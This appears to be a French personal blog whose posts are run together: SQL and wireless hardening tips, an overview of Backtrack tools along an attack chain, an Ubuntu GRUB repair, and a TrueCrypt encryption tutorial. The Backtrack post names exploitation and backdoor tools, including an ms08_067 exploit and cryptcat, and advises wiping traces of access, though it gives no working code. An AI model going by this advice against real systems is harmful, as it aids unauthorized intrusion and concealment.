- Pour se protéger contre les attaques SQL, il faut commencer par sécuriser la configuration du serveur. PostgreSQL, MySQL, Oracle, sont des systèmes de gestion de base de données puissants, mais pas toujours sûrs. Leurs configuration de bases sont souvent trop permissives, et doivent êtres sécurisées au mieux. Lors d’un précédent billet, j’explique comment sécuriser la configuration de PostgreSQL sous Debian. Supprimer les bases de données par défaut inutiles, les mots de passe par défaut (comme cela existe sur MS SQL), ainsi que tout autre paramètre commun à tous autre système. Bref, vous devez laisser le moins de traces possible de vous sur le réseau !

- Séparer les bases de données, créer des utilisateurs SQL, attribuer des droits sur les tables… bref, exploitez à fond les fonctionnalités proposées. Ne vous contentez pas d’une base de données contenant toutes les tables de plusieurs applications métier à la fois, d’un seul utilisateur ayant tous les droits qui exécute toutes les requêtes.

Un exemple : sur un serveur web nous avons un blog, et une application métier.

Déjà, il faut créer deux bases de données minimum (1 pour le blog, et 1 pour l’application métier). Ensuite, créer un utilisateur par base de données qui exécutera le code que vous programmerez lors du développement du site. Pour les tâches annexes, comme les sauvegardes, ou les requêtes SQL bien spécifiques, créer un utilisateur à part, qui aura des droits très restrictifs. Pour information, pour effectuer une sauvegarde de la base de données, un utilisateur avec les droits en SELECT et en LOCK TABLES sont suffisants.

• Analyse des réseaux sans fil

On ne le dira jamais assez : un réseau sans-fil doit être protégé par un algorithme de chiffrement, et si possible opter pour le WPA2. Oublier le WEP, ainsi que les réseaux ouverts. Quant aux équipements bluetooth, désactiver les services inutiles et ne se servir que du nécessaire. Protéger vos équipements comme vous le pouvez, soit par mot de passe ou par des algorithmes de chiffrements.

Note finale.

- Dans la 1ère partie, la liste d’outils est exhaustive, et heureusement ! Il y en a d’autres… tellement que je vous laisse chercher par vous même. La distrib’ Backtrack en propose quand même un bon panel.

- Dans la 2ème partie, je me suis permis d’aller un peu plus loin que prévu, afin que nous puissions y revenir en détail dans les prochains articles (notamment lors des exploitations de failles).

Prochaine étape : Evalutation de vulnérabilité

Source : ici, là, mais aussi mon moteur de recherche préféré, ainsi que la documentation des logiciels proposés.

A l’époque, c’était juste quelques paquets que j’avais installé sur ma Debian, et tout allait bien. Puis je me suis mis au développement web, donc il m’a fallu un logiciel d’audit (w3af et websecurify). S’est rajouté ensuite d’autres outils de découverte réseau pour assouvir ma curiosité.

Il y a un moment où je me suis dit, je veux un OS avec tous ces outils, et si possible une distribution Linux.

Nom de code : Backtrack
Famille : GNU/Linux
Etat du projet : en dev
Sources : Open-source + logiciels libres + logiciels proprios
Version stable actuelle : 5.0
Basée sur : Debian

Les présentations sont faites. Backtrack est donc une distrib Linux orientée sécurité. Elle est principalement pour réaliser des audits.

Je vais passer en revue tout ce que l’on peut faire avec BT, en précisant à chaque fois les outils que j’ai testés (et qui parfois m’ont fait halluciner).
Bien entendu, mon plan respecte une chaîne d’exploit standard.

Pour ceux qui ne voient pas où je veux en venir, je vous résume cela par un petit schéma :

Collecte d’informations -> Évaluation de vulnérabilités -> Exploitation -> Maintien d’accès

• Collecte d’informations

Cette étape permet avant toute chose de savoir qui sera notre victime, et comment elle est équipée : un serveur Windows 2003 ? un routeur Cisco ? un client Linux ? un Wifi protégé par une clé Wep ? un service SNMP un peu trop bavard ? Bref. Nous allons scanner le réseau pour collecter un maximum d’informations, afin d’en détecter ses faiblesses.
Parmi les outils proposés, voici ceux qui m’ont bien servi :

- nmap (à utiliser avec discrétion) : scanner de port, OS fingerprinting, détection de services
- autoscan : découverte réseau
- airodump-ng : écoute wifi
- webshag : audit de serveur web

Exemple de scan avec Nmap

Next step : évaluer ce qui est exploitable.

• Évaluation de vulnérabilité

Nous avons appris à connaître notre victime, maintenant nous allons rechercher ses faiblesses. Laissez 5 minutes votre conscience de coté, nous sortons l’arme lourde.

Sans blablater, voici mes outils préférés :

- Nessus : incontournable dans le monde de la sécurité, c’est certainement un des meilleurs outils d’audits. Après l’avoir installé, configuré, et mis à jour avec la commande nessus-update-plugins, vous avez entre les mains l’outil de référence pour scanner les services d’une machine distante. En plus de vous fournir un tas d’informations importantes sur votre cible, il vous permettra d’exporter les résultats sous forme de fichier XML, que l’on utilisera plus tard avec d’autres outils pour exécuter les attaques directement.
- cisco-auditing-tool : comme son nom l’indique, cet outil est dédié aux équipements actifs de la firme américaine.
- joomscan : outil d’audit de sites web faits avec le CMS Joomla. J’ai effectué des tests sur des sites à moi, et je suis devenu tout rouge quand j’ai vu ce qu’il me trouvait. Je vous conseille de prendre un calmant avant de lancer l’outil, si vous auditez votre propre site [humour].
- w3af & websecurify : 2 outils ultra-puissants pour l’audit de sites web : injections SQL, attaques XSS, etc… ces outils mettront le site distant à nu, et vous éclairerons sur les différentes failles que l’on pourra exploiter.
- sqlninja (MS SQL) & sqlmap (MySQL) : 2 outils de découvertes de failles sur des bases de données SQL

A ce stade là, on peut dire que l’audit est terminé. Quoi, c’est tout ? bien sûr que non. Je vous ai donné mes outils favoris, mais dans certains cas il m’a fallu dénicher un outil bien précis pour tel ou tel service.

Imaginons donc que vous connaissez bien votre victime : son adresse IP, le système d’exploitation, sa version, ses services, leurs versions, etc.

La prochaine étape est décisive : l’exploitation.

• Exploitation

C’est une étape où il faudra utiliser au mieux ses connaissances en informatique, et je pèse mes mots. J’ai mis un peu de temps pour obtenir mon premier shell sur une victime, avec un peu de sécurité entre bien sûr (pour les curieux, mes tests se font en environnement virtuel uniquement).
Donc je vous met en garde tout de suite : il vous faudra certaines qualités humaines pour réussir l’exploitation de failles : patience, persévérance et discrétion.

- Patience : les outils sont parfois longs à prendre en main, et des moyens d’exploit demandent parfois de l’attente comme le keylogging par exemple
- Persévérance : une pénétration ne fonctionne rarement du premier coup, ou alors c’est que vous maîtrisez le truc déjà. Réessayer avec d’autres outils, ou avec d’autres méthodes. Bien lire la doc avant de commencer toute action
- Discrétion : la devise de BT résume bien le message que je veux vous faire passer : The quieter you become, the more you are able to hear. Ne vous lancer pas dans une attaque style GROS BOURRIN JE PETE TOUT ET JE LAISSE PLEIN DE TRACES !!!! non, restez discrets, et supprimez toute preuve de votre accès (ou tentative d’accès) en partant.

Ah, j’ai failli oublié, mes outils préférés d’exploitation :

- Metasploit Framework : incontournable. Il contient tous les exploits et payloads dont vous aurez besoin pour pénétrer un système. Armitage est une interface graphique au framework, qui ma foi est très utile. Cependant, la ligne de commande est à maîtriser pour se faire la main ! Je vous laisse fouiner sur le net pour y trouver toutes les explications nécessaires à son utilisation.

Après exploitation de l’exploit ms08_067_netapi, j’ai obtenu un shell.
- cisco-global-exploiter : outil regroupant les différents exploits vers le matériel Cisco.
- la suite aircrack-ng : outil indispensable pour le cracking wifi.
- beef-ng : outil d’exploitation via le navigateur web (utilisé pour l’ingénierie sociale)

Petite note perso sur l’ingénierie sociale :

Pour ceux qui ne savent pas ce que c’est, je les invite à consulter la définition, car c’est une notion très importante en sécurité. Je dirais même plus, c’est 70% du travail. Pour être hacker, il ne faut donc pas uniquement des talents en informatique, mais également un peu de culot, et surtout penser à la place de sa victime.

Enfin, une fois le système distant pénétré, il est parfois utile d’y revenir plus tard. C’est la prochaine et dernière étape.

• Maintien d’accès

Plutôt que de se retaper tout ce qu’on vient de faire, on va installer un backdoor sur le système, et si possible invisible et indétectable aux yeux de l’utilisateur et surtout des antivirus/firewalls.
C’est avec cette étape que j’ai appris plein de trucs sur les antivirus. En fait, c’est en créant un virus qu’on apprend ce qu’est un virus.

Voici les outils indispensables :

- Metasploit Framework : Et oui, encore lui… décidément, il peut tout faire ! (ou presque )
- Cryptcat : version chiffrée de netcat, un des moyens les plus simples et plus rapides de créer un backdoor.

Après avoir fait tout ça, nous méritons une petite pause bien méritée. Je vais en profiter pour préciser certains trucs.

Tout d’abord, j’ai longtemps hésiter à écrire cet article, car je ne veux pas qu’on pense que je suis un vilain hacker boutonneux qui veut « hack the planet ». Non. Je veux apprendre et comprendre.

- Apprendre ce que les hackers font, pour mieux les appréhender.
- Comprendre comment ils font pour avoir un certain recul sur les protocoles que j’utilise sur mes systèmes.

J’ai appris plusieurs choses :

- des notions techniques que je ne connaissais pas (dont le vocabulaire)
- comment fonctionnait un payload, et un exploit
- comment se protéger un maximum
- qu’une grande partie du travail était de l’ingénierie sociale
- qu’un système n’était jamais parfaitement sécurisé.

Ensuite, je voulais dire que ce n’était qu’une introduction à une série d’articles consacrés à Backtrack. Je n’ai donc pas parler de certaines étapes intermédiaires, comme par exemple l’escalade de privilèges, ou encore du test de stress.

Une dernière chose. Backtrack contient de nombreux outils d’audit, mais également un serveur web apache, un serveur de BDD, ainsi que d’autres services bien utiles. Il convient de la mettre à jour régulièrement afin d’avoir un système stable, sécurisé, et surtout d’avoir les dernières nouveautés en matière d’exploitation. Certaines applications demandent également des mises à jour manuelles (comme Nessus et MSF).

Je termine par ces mots : entraînez-vous, amusez-vous, mais choisissez votre camp. Backtrack n’est pas une distribution pour pirater son voisin de palier, mais bien un système d’exploitation utilisé par des professionnels de l’informatique, dans un but purement conventionnel. C’est donc à vos risques et périls que vous utiliserez cet outil ultra-puissant.

Un grand merci aux développeurs.

J’étais sous Ubuntu 10.10, et je désirais tester Ubuntu 11.04 sur mon ordi perso.

C’est pas la première fois que je fais ça, je sais pas ce qu’il m’est arrivé, mais j’ai démarré la mise à jour à 22h. J’ai fait le rêve de croire que ça serait finit vers minuit, et hop au dodo la conscience tranquille… mais c’était loin d’être le cas, et je peux vous dire que je n’ai pas dormis sur mes petits lauriers. Bref, je vais vous présenter les difficultés que j’ai rencontrées et qui apparemment concernent pas mal de monde.

sudo mount /dev/sdXx /mnt
sudo mount -o bind /dev /mnt/dev
sudo mount -o bind /sys /mnt/sys
sudo mount -o bind /proc /mnt/proc
sudo chroot /mnt

grub-install /dev/sda

update-grub

find -iname *compiz*

Si vous pouvez encore fermer votre session, ou accéder à un terminal pour vous déconnecter, faites-le… sinon faites le gros bourrin en utilisant la commande « shutdown –boutton » (cette commande n’existe pas, c’est de l’humour ).

Aujourd’hui, c’est un moyen de protéger ses fichiers que nous allons voir ensemble.

Certains mots reviennent toujours, comme par exemple le chiffrement qui est d’actualité. En effet, protéger vos fichiers revient à les mettre non seulement en lieu sur, mais surtout accessible que par vous même.

En premier lieu, nous pouvons définir quels types de fichiers il est intéressant de protéger :

• vos fichiers liés à votre vie privée (extraits de compte bancaires, documents officiels, fichiers de mots de passe, etc)
• vos fichiers professionnels (confidentiels ou non, ils ne regardent que vous)
• et tout autre fichier sensible comme vos certificats SSL par exemple, ou encore des documents secrets.

Voici maintenant plusieurs situations qui ne sont que des exemples, mais qui peuvent corrompre vos informations personnelles rapidement :

• vol, ou perte d’ordinateur (contenant un ou plusieurs disques durs)
• piratage de votre système (via Internet, ou le réseau de votre entreprise)
• accès à votre ordinateur par d’autres personnes (collègues ou amis)

Brefs, dans tous les cas, nous avons tous des fichiers sensibles, et nous allons voir comment les garder bien au chaud.

Une solution très efficace : Truecrypt .

C’est un logiciel qui permet deux choses :

• chiffrer des données à la volée (par un simple copier collé)
• stocker ces données soit dans un fichier qui sera monté comme un volume, soit sur une partition qui sera au préalablement formatée par Truecrypt.

L’avantage d’une telle solution est tout d’abord l’impossibilité pour une personne tierce de voir que vous utilisez un moyen de chiffrement. Le fichier ou le périphérique est complétement anodin, et vous offre le déni plausible dans une situation de force. En d’autres termes, personne ne vous mettra le couteau sous la gorge pour vous demander un mot de passe, puisque vos données sont stockées dans un fichier chiffré, qui n’a aucune apparence d’un fichier chiffré.

Nous allons voir l’utilité de ces deux fonctionnement possibles, mais avant tout sachez une chose : vos volumes seront protégés par un mot de passe, et si vous avez envie de renforcer la sécurité, par une clé SSL. Il est primordial de ne pas oublier ce mot de passe, sinon vos fichiers seraient perdus à jamais. De plus, il est bon de rappeler d’avoir des sauvegardes sur plusieurs périphériques différents, au cas où l’un deviendrait défectueux. Bon c’est finis, j’arrête de vous plomber le moral, et je passe à l’action.

• Téléchargement de Truecrypt

Ce logiciel est gratuit, et dispose d’une licence dite libre par les éditeurs, mais reconnue non open-source par certaines distributions Linux. Il fonctionne sous Linux, Mac OS X et MS Windows. Les données chiffrées sur un système d’exploitation sont bien entendu accessibles depuis un autre.

Voici le lien de téléchargement.

Pour le paquetage linux, je vous suggère la version « standard » qui comprend une interface graphique. Cependant, sur un serveur, la version « Console-only » sera la plus appropriée.

Il s’installe simplement en exécutant le binaire téléchargé, rien de bien compliqué.

• Utilisation de Truecrypt par la création d’un fichier

Nous l’avons dit plus haut, vous avez la possibilité de créer un fichier vide dans lequel vous placerez vos fichiers confidentiels. Ce fichier sera de taille fixe, et entièrement chiffré avec plusieurs algorithmes. C’est donc un moyen très facile pour envoyer des fichiers de manière ultra sécurisée par e-mail, par FTP, ou encore si vous devez les stocker sur une clé USB.

Cliquez sur « Volumes« , puis sur « Create New Volume » (chez moi c’est en anglais !). Choisissez ensuite « Create an encrypted file container » (1er choix par défaut). Pour la suite, un volume standard fera l’affaire dans la plupart des situations. Mais sachez qu’il est possible de créer un volume caché sur une partition. Il convient ensuite de choisir l’emplacement du fichier à créer, et son nom.

Ensuite, ce sont les algorithmes de chiffrement qu’il faudra sélectionner. Pour des petits volumes (5 Mo par exemple), je suggère la combinaisons des algorithmes « Serpent-Twofish-AES« , qui permettra une vitesse d’écriture d’environ 70 Mo/s selon votre matériel. Pour des gros volumes, vous pouvez soit utiliser la même chose que précédemment, tout en assumant la vitesse lente de copie, ou alors opter pour un seul chiffrement comme par exemple « Serpent », qui propose une vitesse moyenne d’écriture 130 Mo/s.

Personnellement, tous mes volumes utilisent « Serpent-Twofish-AES« , histoire n’être vraiment protégé. Les informations du volumes (mot de passe, etc) sont hachées, par l’algorithme de votre choix. Mon choix par défaut est « SHA-512″, développé par la NSA (oui, donc vous comprenez pourquoi je l’ai choisis !).

Il faut maintenant choisir la taille du fichier. A vous d’estimer combien de mémoire il vous faudra pour stocker vos fichiers confidentiels, sachant que pour un volume d’1 Mo, seuls 746 Ko seront disponibles.

Une fois votre fichier créé, il va falloir le « monter » avec Truecrypt. Dans la fenêtre principale, choisissez un slot de libre, puis cliquez sur « Select File« . En cliquant sur « Mount« , il vous sera demandé le mot de passe, et si besoin les clés SSL pour ouvrir le volume.

Copier vos fichiers dans ce volume reviendra à les chiffrer à la volée.

• Utilisation de Truecrypt par la création d’une partition

Si vous souhaitez protéger des fichiers présents sur votre ordinateur, il serait préférable de créer une partition qui serait dédiée.

Le principe de création est le même que pour un fichier conteneur.

Le mieux est de disposer d’une partition au préalablement formatée en NTFS. Truecrypt se chargera de la reformater avec les algorithmes choisis. Si vous ne savez pas lesquels choisir, reportez vous au paragraphe précédent.

Attention cependant sous MS Windows où la partition apparaitra comme une partition non formatée. Une fois montée, pas de soucis accéder librement à vos fichiers ! Ne vous faites pas avoir !

La partition se monte également avec Truecrypt en cliquant sur « Select device« , puis en sélectionnant le périphérique voulu.

Personnellement, j’utilise cette méthode pour conserver sur mon ordinateur des fichiers sensibles.

Sachez toutefois qu’il faut démonter le volume une fois que vous quitter votre ordinateur :

• Sous MS Windows, une déconnexion d’utilisateur n’entraine pas le démontage du volume, attention donc si vous utilisez des sessions !
• Les fichiers étant montés sur l’ordinateur, restent à la merci de tout pirate ayant accès à votre ordinateur.

Il faudra donc éviter de mémoriser les mots de passe des volumes (en désactivant l’historique), ainsi que de les laisser ouverts.

Enfin, je vous conseille vivement un mot de passe long et compliqué (au moins 15 caractères avec des lettres, des chiffres et des symboles). Par exemple, une phrase mnémotechnique peut faire l’affaire. En effet, avec un outil de bruteforce il serait possible d’ouvrir le fichier ou périphérique au bout d’un certain temps. Plus votre mot de passe est long et dur, plus de temps il sera nécessaire pour accéder aux données.

• Conclusion

Truecrypt est un logiciel de chiffrement à la volée parmi tant d’autres.. Pas de backdoor, et le code source est complètement ouvert à tous.

Sachez que l’application est également disponible en « application portable » et qu’il est possible (et même conseillé) de changer les mots de passe des volumes autant de fois que l’on souhaite.

Protéger ses fichiers est aussi important que de protéger ses informations personnelles.

Dans un environnement toujours plus « online », il est plus que nécessaire d’utiliser ce type de solution. A bon entendeur !

[Edit] J’ai pris en compte vos commentaires, et je remercie des précisions qui m’ont été apportées. J’ai bien entendu corrigé le fait que Truecrypt n’est pas un logiciel reconnu comme libre. Merci de faire vivre ce blog !